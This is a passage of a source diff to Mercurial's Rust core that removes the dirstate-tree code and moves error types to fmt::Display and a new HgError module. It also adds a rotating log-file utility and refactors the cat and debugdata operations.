Err(HgError::CorruptedRepository(format!( + "bad dirstate size: {} != {}", + expected_size, + packed.len() + ))); } Ok(packed) } -/// `now` is the duration in seconds since the Unix epoch -#[cfg(feature = "dirstate-tree")] -pub fn pack_dirstate( - state_map: &mut StateMap, - copy_map: &CopyMap, - parents: DirstateParents, - now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { - // TODO move away from i32 before 2038. 
- let now: i32 = now.as_secs().try_into().expect("time overflow"); - - let expected_size: usize = state_map - .iter() - .map(|(filename, _)| { - let mut length = MIN_ENTRY_SIZE + filename.len(); - if let Some(copy) = copy_map.get(&filename) { - length += copy.len() + 1; - } - length - }) - .sum(); - let expected_size = expected_size + PARENT_SIZE * 2; - - let mut packed = Vec::with_capacity(expected_size); - let mut new_state_map = vec![]; - - packed.extend(&parents.p1); - packed.extend(&parents.p2); - - for (filename, entry) in state_map.iter() { - let new_filename = filename.to_owned(); - let mut new_mtime: i32 = entry.mtime; - if entry.state == EntryState::Normal && entry.mtime == now { - // The file was last modified "simultaneously" with the current - // write to dirstate (i.e. within the same second for file- - // systems with a granularity of 1 sec). This commonly happens - // for at least a couple of files on 'update'. - // The user could change the file without changing its size - // within the same second. Invalidate the file's mtime in - // dirstate, forcing future 'status' calls to compare the - // contents of the file if the size is the same. This prevents - // mistakenly treating such files as clean. 
- new_mtime = -1; - new_state_map.push(( - filename.to_owned(), - DirstateEntry { - mtime: new_mtime, - ..entry - }, - )); - } - let mut new_filename = new_filename.into_vec(); - if let Some(copy) = copy_map.get(&filename) { - new_filename.push(b'\0'); - new_filename.extend(copy.bytes()); - } - - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; - packed.extend(new_filename) - } - - if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); - } - - state_map.extend(new_state_map); - - Ok(packed) -} #[cfg(test)] mod tests { @@ -235,8 +157,8 @@ let mut state_map = StateMap::default(); let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = b"1234567891011121314100000000000000000000".to_vec(); @@ -266,8 +188,8 @@ let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -306,8 +228,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -346,8 +268,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let 
result = @@ -366,7 +288,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -424,8 +346,8 @@ HgPathBuf::from_bytes(b"copyname2"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -444,7 +366,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -470,8 +392,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -491,7 +413,7 @@ assert_eq!( ( - parents, + &parents, [( HgPathBuf::from_bytes(b"f1"), DirstateEntry { diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -9,9 +9,6 @@ //! It is currently missing a lot of functionality compared to the Python one //! and will only be triggered in narrow cases. 
-#[cfg(feature = "dirstate-tree")] -use crate::dirstate::dirstate_tree::iter::StatusShortcut; -#[cfg(not(feature = "dirstate-tree"))] use crate::utils::path_auditor::PathAuditor; use crate::{ dirstate::SIZE_FROM_OTHER_PARENT, @@ -33,6 +30,7 @@ use std::{ borrow::Cow, collections::HashSet, + fmt, fs::{read_dir, DirEntry}, io::ErrorKind, ops::Deref, @@ -51,17 +49,16 @@ Unknown, } -impl ToString for BadType { - fn to_string(&self) -> String { - match self { +impl fmt::Display for BadType { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.write_str(match self { BadType::CharacterDevice => "character device", BadType::BlockDevice => "block device", BadType::FIFO => "fifo", BadType::Socket => "socket", BadType::Directory => "directory", BadType::Unknown => "unknown", - } - .to_string() + }) } } @@ -184,7 +181,13 @@ || other_parent || copy_map.contains_key(filename.as_ref()) { - Dispatch::Modified + if metadata.is_symlink() && size_changed { + // issue6456: Size returned may be longer due to encryption + // on EXT-4 fscrypt. TODO maybe only do it on EXT4? 
+ Dispatch::Unsure + } else { + Dispatch::Modified + } } else if mod_compare(mtime, st_mtime as i32) || st_mtime == options.last_normal_time { @@ -265,7 +268,7 @@ pub traversed: Vec<HgPathBuf>, } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum StatusError { /// Generic IO error IO(std::io::Error), @@ -277,28 +280,12 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl From<PatternError> for StatusError { - fn from(e: PatternError) -> Self { - StatusError::Pattern(e) - } -} -impl From<HgPathError> for StatusError { - fn from(e: HgPathError) -> Self { - StatusError::Path(e) - } -} -impl From<std::io::Error> for StatusError { - fn from(e: std::io::Error) -> Self { - StatusError::IO(e) - } -} - -impl ToString for StatusError { - fn to_string(&self) -> String { +impl fmt::Display for StatusError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - StatusError::IO(e) => e.to_string(), - StatusError::Path(e) => e.to_string(), - StatusError::Pattern(e) => e.to_string(), + StatusError::IO(error) => error.fmt(f), + StatusError::Path(error) => error.fmt(f), + StatusError::Pattern(error) => error.fmt(f), } } } @@ -713,83 +700,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(feature = "dirstate-tree")] - #[timed] - pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend( - self.dmap - .fs_iter(self.root_dir.clone()) - .par_bridge() - .filter(|(path, _)| self.matcher.matches(path)) - .map(move |(filename, shortcut)| { - let entry = match shortcut { - StatusShortcut::Entry(e) => e, - StatusShortcut::Dispatch(d) => { - return (Cow::Owned(filename), d) - } - }; - let filename_as_path = match hg_path_to_path_buf(&filename) - { - Ok(f) => f, - Err(_) => { - return ( - Cow::Owned(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = self - .root_dir - .join(filename_as_path) - .symlink_metadata(); - - match meta { - Ok(m) - if 
!(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Ok(m) => { - let dispatch = dispatch_found( - &filename, - entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ); - (Cow::Owned(filename), dispatch) - } - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Owned(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => { - (Cow::Owned(filename), dispatch_os_error(&e)) - } - } - }), - ); - } - - /// Add the files in the dirstate to the results. - /// - /// This takes a mutable reference to the results to account for the - /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { results.par_extend( @@ -860,7 +770,6 @@ /// /// This takes a mutable reference to the results to account for the /// `extend` in timings - #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) { let to_visit: Vec<(&HgPath, &DirstateEntry)> = diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/errors.rs @@ -0,0 +1,183 @@ +use crate::config::ConfigValueParseError; +use std::fmt; + +/// Common error cases that can happen in many different APIs +#[derive(Debug, derive_more::From)] +pub enum HgError { + IoError { + error: std::io::Error, + context: IoErrorContext, + }, + + /// A file under `.hg/` normally only written by Mercurial is not in the + /// expected format. This indicates a bug in Mercurial, filesystem + /// corruption, or hardware failure. 
+ /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + CorruptedRepository(String), + + /// The repository or requested operation involves a feature not + /// supported by the Rust implementation. Falling back to the Python + /// implementation may or may not work. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + UnsupportedFeature(String), + + /// Operation cannot proceed for some other reason. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + Abort(String), + + /// A configuration value is not in the expected syntax. + /// + /// These errors can happen in many places in the code because values are + /// parsed lazily as the file-level parser does not know the expected type + /// and syntax of each value. + #[from] + ConfigValueParseError(ConfigValueParseError), +} + +/// Details about where an I/O error happened +#[derive(Debug)] +pub enum IoErrorContext { + ReadingFile(std::path::PathBuf), + WritingFile(std::path::PathBuf), + RemovingFile(std::path::PathBuf), + RenamingFile { + from: std::path::PathBuf, + to: std::path::PathBuf, + }, + /// `std::fs::canonicalize` + CanonicalizingPath(std::path::PathBuf), + /// `std::env::current_dir` + CurrentDir, + /// `std::env::current_exe` + CurrentExe, +} + +impl HgError { + pub fn corrupted(explanation: impl Into<String>) -> Self { + // TODO: capture a backtrace here and keep it in the error value + // to aid debugging? + // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html + HgError::CorruptedRepository(explanation.into()) + } + + pub fn unsupported(explanation: impl Into<String>) -> Self { + HgError::UnsupportedFeature(explanation.into()) + } + pub fn abort(explanation: impl Into<String>) -> Self { + HgError::Abort(explanation.into()) + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? 
+impl fmt::Display for HgError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + HgError::Abort(explanation) => write!(f, "{}", explanation), + HgError::IoError { error, context } => { + write!(f, "abort: {}: {}", context, error) + } + HgError::CorruptedRepository(explanation) => { + write!(f, "abort: {}", explanation) + } + HgError::UnsupportedFeature(explanation) => { + write!(f, "unsupported feature: {}", explanation) + } + HgError::ConfigValueParseError(error) => error.fmt(f), + } + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for IoErrorContext { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + IoErrorContext::ReadingFile(path) => { + write!(f, "when reading {}", path.display()) + } + IoErrorContext::WritingFile(path) => { + write!(f, "when writing {}", path.display()) + } + IoErrorContext::RemovingFile(path) => { + write!(f, "when removing {}", path.display()) + } + IoErrorContext::RenamingFile { from, to } => write!( + f, + "when renaming {} to {}", + from.display(), + to.display() + ), + IoErrorContext::CanonicalizingPath(path) => { + write!(f, "when canonicalizing {}", path.display()) + } + IoErrorContext::CurrentDir => { + write!(f, "error getting current working directory") + } + IoErrorContext::CurrentExe => { + write!(f, "error getting current executable") + } + } + } +} + +pub trait IoResultExt<T> { + /// Annotate a possible I/O error as related to a reading a file at the + /// given path. + /// + /// This allows printing something like “File not found when reading + /// example.txt” instead of just “File not found”. + /// + /// Converts a `Result` with `std::io::Error` into one with `HgError`. 
+ fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>; + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError>; +} + +impl<T> IoResultExt<T> for std::io::Result<T> { + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.with_context(|| IoErrorContext::ReadingFile(path.to_owned())) + } + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError> { + self.map_err(|error| HgError::IoError { + error, + context: context(), + }) + } +} + +pub trait HgResultExt<T> { + /// Handle missing files separately from other I/O error cases. + /// + /// Wraps the `Ok` type in an `Option`: + /// + /// * `Ok(x)` becomes `Ok(Some(x))` + /// * An I/O "not found" error becomes `Ok(None)` + /// * Other errors are unchanged + fn io_not_found_as_none(self) -> Result<Option<T>, HgError>; +} + +impl<T> HgResultExt<T> for Result<T, HgError> { + fn io_not_found_as_none(self) -> Result<Option<T>, HgError> { + match self { + Ok(x) => Ok(Some(x)), + Err(HgError::IoError { error, .. }) + if error.kind() == std::io::ErrorKind::NotFound => + { + Ok(None) + } + Err(other_error) => Err(other_error), + } + } +} diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -3,8 +3,10 @@ // // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. 
+ mod ancestors; pub mod dagops; +pub mod errors; pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors}; mod dirstate; pub mod discovery; @@ -15,7 +17,8 @@ dirstate_map::DirstateMap, parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE}, status::{ - status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions, + status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError, + StatusOptions, }, CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState, StateMap, StateMapIter, @@ -27,23 +30,18 @@ pub mod revlog; pub use revlog::*; pub mod config; +pub mod logging; pub mod operations; +pub mod revset; pub mod utils; -// Remove this to see (potential) non-artificial compile failures. MacOS -// *should* compile, but fail to compile tests for example as of 2020-03-06 -#[cfg(not(target_os = "linux"))] -compile_error!( - "`hg-core` has only been tested on Linux and will most \ - likely not behave correctly on other platforms." -); - use crate::utils::hg_path::{HgPathBuf, HgPathError}; pub use filepatterns::{ parse_pattern_syntax, read_pattern_file, IgnorePattern, PatternFileWarning, PatternSyntax, }; use std::collections::HashMap; +use std::fmt; use twox_hash::RandomXxHashBuilder64; /// This is a contract between the `micro-timer` crate and us, to expose @@ -57,45 +55,6 @@ /// write access to your repository, you have other issues. 
pub type FastHashMap<K, V> = HashMap<K, V, RandomXxHashBuilder64>; -#[derive(Clone, Debug, PartialEq)] -pub enum DirstateParseError { - TooLittleData, - Overflow, - // TODO refactor to use bytes instead of String - CorruptedEntry(String), - Damaged, -} - -impl From<std::io::Error> for DirstateParseError { - fn from(e: std::io::Error) -> Self { - DirstateParseError::CorruptedEntry(e.to_string()) - } -} - -impl ToString for DirstateParseError { - fn to_string(&self) -> String { - use crate::DirstateParseError::*; - match self { - TooLittleData => "Too little data for dirstate.".to_string(), - Overflow => "Overflow in dirstate.".to_string(), - CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e), - Damaged => "Dirstate appears to be damaged.".to_string(), - } - } -} - -#[derive(Debug, PartialEq)] -pub enum DirstatePackError { - CorruptedEntry(String), - CorruptedParent, - BadSize(usize, usize), -} - -impl From<std::io::Error> for DirstatePackError { - fn from(e: std::io::Error) -> Self { - DirstatePackError::CorruptedEntry(e.to_string()) - } -} #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -103,94 +62,61 @@ InvalidPath(HgPathError), } -impl ToString for DirstateMapError { - fn to_string(&self) -> String { +impl fmt::Display for DirstateMapError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { DirstateMapError::PathNotFound(_) => { - "expected a value, found none".to_string() + f.write_str("expected a value, found none") } - DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(), - DirstateMapError::InvalidPath(e) => e.to_string(), + DirstateMapError::EmptyPath => { + f.write_str("Overflow in dirstate.") + } + DirstateMapError::InvalidPath(path_error) => path_error.fmt(f), } } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DirstateError { - Parse(DirstateParseError), - Pack(DirstatePackError), Map(DirstateMapError), - IO(std::io::Error), + Common(errors::HgError), } -impl 
From<DirstateParseError> for DirstateError { - fn from(e: DirstateParseError) -> Self { - DirstateError::Parse(e) - } -} - -impl From<DirstatePackError> for DirstateError { - fn from(e: DirstatePackError) -> Self { - DirstateError::Pack(e) - } -} - -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum PatternError { + #[from] Path(HgPathError), UnsupportedSyntax(String), UnsupportedSyntaxInFile(String, String, usize), TooLong(usize), + #[from] IO(std::io::Error), /// Needed a pattern that can be turned into a regex but got one that /// can't. This should only happen through programmer error. NonRegexPattern(IgnorePattern), } -impl ToString for PatternError { - fn to_string(&self) -> String { +impl fmt::Display for PatternError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { PatternError::UnsupportedSyntax(syntax) => { - format!("Unsupported syntax {}", syntax) + write!(f, "Unsupported syntax {}", syntax) } PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => { - format!( + write!( + f, "{}:{}: unsupported syntax {}", file_path, line, syntax ) } PatternError::TooLong(size) => { - format!("matcher pattern is too long ({} bytes)", size) + write!(f, "matcher pattern is too long ({} bytes)", size) } - PatternError::IO(e) => e.to_string(), - PatternError::Path(e) => e.to_string(), + PatternError::IO(error) => error.fmt(f), + PatternError::Path(error) => error.fmt(f), PatternError::NonRegexPattern(pattern) => { - format!("'{:?}' cannot be turned into a regex", pattern) + write!(f, "'{:?}' cannot be turned into a regex", pattern) } } } } - -impl From<DirstateMapError> for DirstateError { - fn from(e: DirstateMapError) -> Self { - DirstateError::Map(e) - } -} - -impl From<std::io::Error> for DirstateError { - fn from(e: std::io::Error) -> Self { - DirstateError::IO(e) - } -} - -impl From<std::io::Error> for PatternError { - fn from(e: std::io::Error) -> Self { - PatternError::IO(e) - } -} - -impl From<HgPathError> for 
PatternError {
-    fn from(e: HgPathError) -> Self {
-        PatternError::Path(e)
-    }
-}
diff --git a/rust/hg-core/src/logging.rs b/rust/hg-core/src/logging.rs
new file mode 100644
--- /dev/null
+++ b/rust/hg-core/src/logging.rs
@@ -0,0 +1,101 @@
+use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt};
+use crate::repo::Vfs;
+use std::io::Write;
+
+/// A utility to append to a log file with the given name, and optionally
+/// rotate it after it reaches a certain maximum size.
+///
+/// Rotation works by renaming "example.log" to "example.log.1", after renaming
+/// "example.log.1" to "example.log.2" etc up to the given maximum number of
+/// files.
+pub struct LogFile<'a> {
+ vfs: Vfs<'a>,
+ name: &'a str,
+ max_size: Option<u64>,
+ max_files: u32,
+}
+
+impl<'a> LogFile<'a> {
+ pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self {
+ Self {
+ vfs,
+ name,
+ max_size: None,
+ max_files: 0,
+ }
+ }
+
+ /// Rotate before writing to a log file that was already larger than the
+ /// given size, in bytes. `None` disables rotation.
+ pub fn max_size(mut self, value: Option<u64>) -> Self {
+ self.max_size = value;
+ self
+ }
+
+ /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in
+ /// addition to the original `{name}` file.
+ pub fn max_files(mut self, value: u32) -> Self {
+ self.max_files = value;
+ self
+ }
+
+ /// Append the given `bytes` as-is to the log file, after rotating if
+ /// needed.
+ ///
+ /// No trailing newline is added. Make sure to include one in `bytes` if
+ /// desired.
+ pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> { + let path = self.vfs.join(self.name); + let context = || IoErrorContext::WritingFile(path.clone()); + let open = || { + std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&path) + .with_context(context) + }; + let mut file = open()?; + if let Some(max_size) = self.max_size { + if file.metadata().with_context(context)?.len() >= max_size { + // For example with `max_files == 5`, the first iteration of + // this loop has `i == 4` and renames `{name}.4` to `{name}.5`. + // The last iteration renames `{name}.1` to + // `{name}.2` + for i in (1..self.max_files).rev() { + self.vfs + .rename( + format!("{}.{}", self.name, i), + format!("{}.{}", self.name, i + 1), + ) + .io_not_found_as_none()?; + } + // Then rename `{name}` to `{name}.1`. This is the + // previously-opened `file`. + self.vfs + .rename(self.name, format!("{}.1", self.name)) + .io_not_found_as_none()?; + // Finally, create a new `{name}` file and replace our `file` + // handle. 
+ file = open()?; + } + } + file.write_all(bytes).with_context(context)?; + file.sync_all().with_context(context) + } +} + +#[test] +fn test_rotation() { + let temp = tempfile::tempdir().unwrap(); + let vfs = Vfs { base: temp.path() }; + let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2); + logger.write(b"one\n").unwrap(); + logger.write(b"two\n").unwrap(); + logger.write(b"3\n").unwrap(); + logger.write(b"four\n").unwrap(); + logger.write(b"five\n").unwrap(); + assert_eq!(vfs.read("log").unwrap(), b"five\n"); + assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n"); + assert_eq!(vfs.read("log.2").unwrap(), b"two\n"); + assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none()); +} diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -5,7 +5,6 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use std::convert::From; use std::path::PathBuf; use crate::repo::Repo; @@ -15,99 +14,59 @@ use crate::revlog::revlog::Revlog; use crate::revlog::revlog::RevlogError; use crate::revlog::Node; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; +pub struct CatOutput { + /// Whether any file in the manifest matched the paths given as CLI + /// arguments + pub found_any: bool, + /// The contents of matching files, in manifest order + pub concatenated: Vec<u8>, + /// Which of the CLI arguments did not match any manifest file + pub missing: Vec<HgPathBuf>, + /// The node ID that the given revset was resolved to + pub node: Node, +} + const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Kind of error encountered by `CatRev` -#[derive(Debug)] -pub enum CatRevErrorKind { - /// Error when reading a `revlog` file. 
- IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -/// A `CatRev` error -#[derive(Debug)] -pub struct CatRevError { - /// Kind of error encountered by `CatRev` - pub kind: CatRevErrorKind, -} - -impl From<CatRevErrorKind> for CatRevError { - fn from(kind: CatRevErrorKind) -> Self { - CatRevError { kind } - } -} - -impl From<RevlogError> for CatRevError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => CatRevErrorKind::IoError(err), - RevlogError::UnsuportedVersion(version) => { - CatRevErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix, - RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - CatRevErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - -/// List files under Mercurial control at a given revision. +/// Output the given revision of files /// /// * `root`: Repository root /// * `rev`: The revision to cat the files from. /// * `files`: The files to output. 
-pub fn cat( +pub fn cat<'a>( repo: &Repo, - rev: &str, - files: &[HgPathBuf], -) -> Result<Vec<u8>, CatRevError> { + revset: &str, + files: &'a [HgPathBuf], +) -> Result<CatOutput, RevlogError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node.borrow())? - } - }; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let changelog_entry = changelog.get_rev(rev)?; + let node = *changelog + .node_from_rev(rev) + .expect("should succeed when changelog.get_rev did"); + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; + let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; + let mut matched = vec![false; files.len()]; + let mut found_any = false; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { - for cat_file in files.iter() { + for (cat_file, is_matched) in files.iter().zip(&mut matched) { if cat_file.as_bytes() == manifest_file.as_bytes() { + *is_matched = true; + found_any = true; let index_path = store_path(manifest_file, b".i"); let data_path = store_path(manifest_file, b".d"); let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; - let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let file_rev = file_log.get_node_rev((&file_node).into())?; + let file_node = Node::from_hex_for_repo(node_bytes)?; + let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { let 
end_delimiter_position = data @@ -125,7 +84,18 @@ } } - Ok(bytes) + let missing: Vec<_> = files + .iter() + .zip(&matched) + .filter(|pair| !*pair.1) + .map(|pair| pair.0.clone()) + .collect(); + Ok(CatOutput { + found_any, + concatenated: bytes, + missing, + node, + }) } fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -7,8 +7,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; /// Kind of data to debug #[derive(Debug, Copy, Clone)] @@ -17,86 +15,19 @@ Manifest, } -/// Kind of error encountered by DebugData -#[derive(Debug)] -pub enum DebugDataErrorKind { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. 
- UnknowRevlogDataFormat(u8), -} - -/// A DebugData error -#[derive(Debug)] -pub struct DebugDataError { - /// Kind of error encountered by DebugData - pub kind: DebugDataErrorKind, -} - -impl From<DebugDataErrorKind> for DebugDataError { - fn from(kind: DebugDataErrorKind) -> Self { - DebugDataError { kind } - } -} - -impl From<std::io::Error> for DebugDataError { - fn from(err: std::io::Error) -> Self { - let kind = DebugDataErrorKind::IoError(err); - DebugDataError { kind } - } -} - -impl From<RevlogError> for DebugDataError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => DebugDataErrorKind::IoError(err), - RevlogError::UnsuportedVersion(version) => { - DebugDataErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - DebugDataErrorKind::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - DebugDataErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - DebugDataErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - /// Dump the contents data of a revision. pub fn debug_data( repo: &Repo, - rev: &str, + revset: &str, kind: DebugDataKind, -) -> Result<Vec<u8>, DebugDataError> { +) -> Result<Vec<u8>, RevlogError> { let index_file = match kind { DebugDataKind::Changelog => "00changelog.i", DebugDataKind::Manifest => "00manifest.i", }; let revlog = Revlog::open(repo, index_file, None)?; - - let data = match rev.parse::<Revision>() { - Ok(rev) => revlog.get_rev_data(rev)?, - _ => { - let node = NodePrefix::from_hex(&rev) - .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node.borrow())?; - revlog.get_rev_data(rev)? 
- } - }; - + let rev = + crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?; + let data = revlog.get_rev_data(rev)?; Ok(data) } diff --git a/rust/hg-core/src/operations/dirstate_status.rs b/rust/hg-core/src/operations/dirstate_status.rs --- a/rust/hg-core/src/operations/dirstate_status.rs +++ b/rust/hg-core/src/operations/dirstate_status.rs @@ -14,66 +14,6 @@ /// files. pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>); -#[cfg(feature = "dirstate-tree")] -impl<'a, M: Matcher + Sync> Status<'a, M> { - pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { - let (traversed_sender, traversed_receiver) = - crossbeam_channel::unbounded(); - - // Step 1: check the files explicitly mentioned by the user - let (work, mut results) = self.walk_explicit(traversed_sender.clone()); - - // Step 2: Check files in the dirstate - if !self.matcher.is_exact() { - self.extend_from_dmap(&mut results); - } - // Step 3: Check the working directory if listing unknowns - if !work.is_empty() { - // Hashmaps are quite a bit slower to build than vecs, so only - // build it if needed. 
